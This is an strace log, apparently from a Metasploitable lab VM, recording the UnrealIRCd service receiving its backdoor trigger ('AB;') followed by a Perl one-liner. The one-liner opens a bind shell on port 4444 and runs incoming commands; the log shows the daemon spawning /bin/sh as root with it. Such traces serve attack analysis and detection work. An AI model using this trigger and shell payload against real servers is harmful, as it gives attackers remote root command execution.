4519  07:31:17.520727 select(1024, [2 3 4 7 9], [], NULL, {0, 680000}) = 1 (in [2], left {0, 480000})

4519  07:31:17.721964 clock_gettime(CLOCK_MONOTONIC, {2287, 539002159}) = 0

4519  07:31:17.722031 accept(2, 0, NULL) = 5

4519  07:31:17.722069 getpeername(5, {sa_family=AF_INET, sin_port=htons(34141), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:31:17.722160 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:31:17.722191 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:31:17.722204 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:31:17.722217 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:31:17.722264 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:31:17.722295 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:31:17.722345 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:31:17.722398 clock_gettime(CLOCK_MONOTONIC, {2287, 539411541}) = 0

4519  07:31:17.722427 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:31:17.722459 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:31:17.722560 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:31:17.722570 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:31:17.722581 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:31:17.722617 send(6, "C\325\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:31:17.722674 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:31:17.722716 gettimeofday({1495625477, 722720}, NULL) = 0

4519  07:31:17.722745 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:31:17.728612 clock_gettime(CLOCK_MONOTONIC, {2287, 545651237}) = 0

4519  07:31:17.728652 recvfrom(6, "C\325\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\\\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:31:17.728707 close(6)          = 0

4519  07:31:17.728723 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:31:17.728738 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:31:17.728796 time(NULL)        = 1495625477

4519  07:31:17.728810 time(NULL)        = 1495625477

4519  07:31:17.728843 gettimeofday({1495625477, 728861}, NULL) = 0

4519  07:31:17.728869 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:31:17.728898 clock_gettime(CLOCK_MONOTONIC, {2287, 545911190}) = 0

4519  07:31:17.728909 gettimeofday({1495625477, 728990}, NULL) = 0

4519  07:31:17.729001 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 0 (Timeout)

4519  07:31:18.728275 clock_gettime(CLOCK_MONOTONIC, {2288, 545334558}) = 0

4519  07:31:18.728574 gettimeofday({1495625478, 728582}, NULL) = 0

4519  07:31:18.728625 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:31:18.728740 clock_gettime(CLOCK_MONOTONIC, {2288, 545753933}) = 0

4519  07:31:18.728754 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:31:18.728802 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:31:18.728844 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:31:18.728856 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:31:18.728872 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10087

10087 07:31:18.728958 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10087 07:31:18.728973 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10087 07:31:18.728983 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10087 07:31:18.729011 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10087 07:31:18.729203 brk(0)            = 0x80f9000

10087 07:31:18.729225 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.729241 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f6a000

10087 07:31:18.729259 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.729276 open("/etc/ld.so.cache", O_RDONLY) = 1

10087 07:31:18.729289 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10087 07:31:18.729307 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f62000

10087 07:31:18.729317 close(1)          = 0

10087 07:31:18.729327 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.729343 open("/lib/libncurses.so.5", O_RDONLY) = 1

10087 07:31:18.729355 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10087 07:31:18.729447 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10087 07:31:18.729464 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f32000

10087 07:31:18.729476 mmap2(0xb7f5f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f5f000

10087 07:31:18.729492 close(1)          = 0

10087 07:31:18.729503 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.729518 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10087 07:31:18.729550 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10087 07:31:18.729700 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10087 07:31:18.729717 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f2e000

10087 07:31:18.729732 mmap2(0xb7f30000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f30000

10087 07:31:18.729748 close(1)          = 0

10087 07:31:18.729759 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.729773 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10087 07:31:18.729786 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10087 07:31:18.729873 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10087 07:31:18.729889 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2d000

10087 07:31:18.729902 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dde000

10087 07:31:18.729913 mmap2(0xb7f27000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f27000

10087 07:31:18.729927 mmap2(0xb7f2a000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f2a000

10087 07:31:18.729940 close(1)          = 0

10087 07:31:18.729962 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ddd000

10087 07:31:18.729973 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7ddd6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10087 07:31:18.730027 mprotect(0xb7f27000, 4096, PROT_READ) = 0

10087 07:31:18.730094 munmap(0xb7f62000, 29913) = 0

10087 07:31:18.730121 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10087 07:31:18.730134 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10087 07:31:18.730154 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf863220) = -1 ENOTTY (Inappropriate ioctl for device)

10087 07:31:18.730183 brk(0)            = 0x80f9000

10087 07:31:18.730192 brk(0x80fa000)    = 0x80fa000

10087 07:31:18.730204 brk(0x80fb000)    = 0x80fb000

10087 07:31:18.730220 getuid32()        = 0

10087 07:31:18.730229 getgid32()        = 0

10087 07:31:18.730238 geteuid32()       = 0

10087 07:31:18.730246 getegid32()       = 0

10087 07:31:18.730259 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10087 07:31:18.730272 time(NULL)        = 1495625478

10087 07:31:18.730285 brk(0x80fc000)    = 0x80fc000

10087 07:31:18.730298 brk(0x80fd000)    = 0x80fd000

10087 07:31:18.730317 open("/proc/meminfo", O_RDONLY) = 1

10087 07:31:18.730338 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10087 07:31:18.730356 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f69000

10087 07:31:18.730367 read(1, "MemTotal:      1035240 kB\nMemFree:        432628 kB\nBuffers:         75516 kB\nCached:         368144 kB\nSwapCached:          0 kB\nActive:         256160 kB\nInactive:       316428 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        432388 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4856 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            18896 kB\nSReclaimable:    10360 kB\nSUnreclaim:       8536 kB\nPageTables:       1952 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10087 07:31:18.730453 close(1)          = 0

10087 07:31:18.730511 munmap(0xb7f69000, 4096) = 0

10087 07:31:18.730540 brk(0x80fe000)    = 0x80fe000

10087 07:31:18.730583 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10087 07:31:18.730596 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10087 07:31:18.730608 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10087 07:31:18.730620 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10087 07:31:18.730631 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10087 07:31:18.730643 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10087 07:31:18.730655 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10087 07:31:18.730667 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10087 07:31:18.730680 uname({sys="Linux", node="metasploitable", ...}) = 0

10087 07:31:18.730727 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10087 07:31:18.730745 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10087 07:31:18.730762 brk(0x8100000)    = 0x8100000

10087 07:31:18.730773 getcwd("/etc/unreal", 4096) = 12

10087 07:31:18.730787 getpid()          = 10087

10087 07:31:18.730803 getppid()         = 4519

10087 07:31:18.730818 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10087 07:31:18.730837 stat64("/sbin/sh", 0xbf8631f8) = -1 ENOENT (No such file or directory)

10087 07:31:18.730849 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10087 07:31:18.730866 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10087 07:31:18.730889 socket(PF_FILE, SOCK_STREAM, 0) = 1

10087 07:31:18.730902 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10087 07:31:18.730914 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10087 07:31:18.730936 close(1)          = 0

10087 07:31:18.730947 socket(PF_FILE, SOCK_STREAM, 0) = 1

10087 07:31:18.730983 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10087 07:31:18.731031 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10087 07:31:18.731066 close(1)          = 0

10087 07:31:18.731080 open("/etc/nsswitch.conf", O_RDONLY) = 1

10087 07:31:18.731094 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10087 07:31:18.731111 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f69000

10087 07:31:18.731122 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10087 07:31:18.731170 read(1, "", 4096) = 0

10087 07:31:18.731179 close(1)          = 0

10087 07:31:18.731188 munmap(0xb7f69000, 4096) = 0

10087 07:31:18.731204 open("/etc/ld.so.cache", O_RDONLY) = 1

10087 07:31:18.731216 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10087 07:31:18.731232 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f62000

10087 07:31:18.731242 close(1)          = 0

10087 07:31:18.731252 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.731266 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10087 07:31:18.731281 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10087 07:31:18.731371 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10087 07:31:18.731388 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd4000

10087 07:31:18.731399 mmap2(0xb7ddb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7ddb000

10087 07:31:18.731416 close(1)          = 0

10087 07:31:18.731427 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.731440 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10087 07:31:18.731472 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10087 07:31:18.731618 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10087 07:31:18.731635 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dbc000

10087 07:31:18.731646 mmap2(0xb7dd0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7dd0000

10087 07:31:18.731661 mmap2(0xb7dd2000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dd2000

10087 07:31:18.731674 close(1)          = 0

10087 07:31:18.731702 munmap(0xb7f62000, 29913) = 0

10087 07:31:18.731718 open("/etc/ld.so.cache", O_RDONLY) = 1

10087 07:31:18.731731 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10087 07:31:18.731746 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f62000

10087 07:31:18.731756 close(1)          = 0

10087 07:31:18.731766 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.731780 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10087 07:31:18.731794 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10087 07:31:18.731884 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10087 07:31:18.731901 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db2000

10087 07:31:18.731912 mmap2(0xb7dba000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dba000

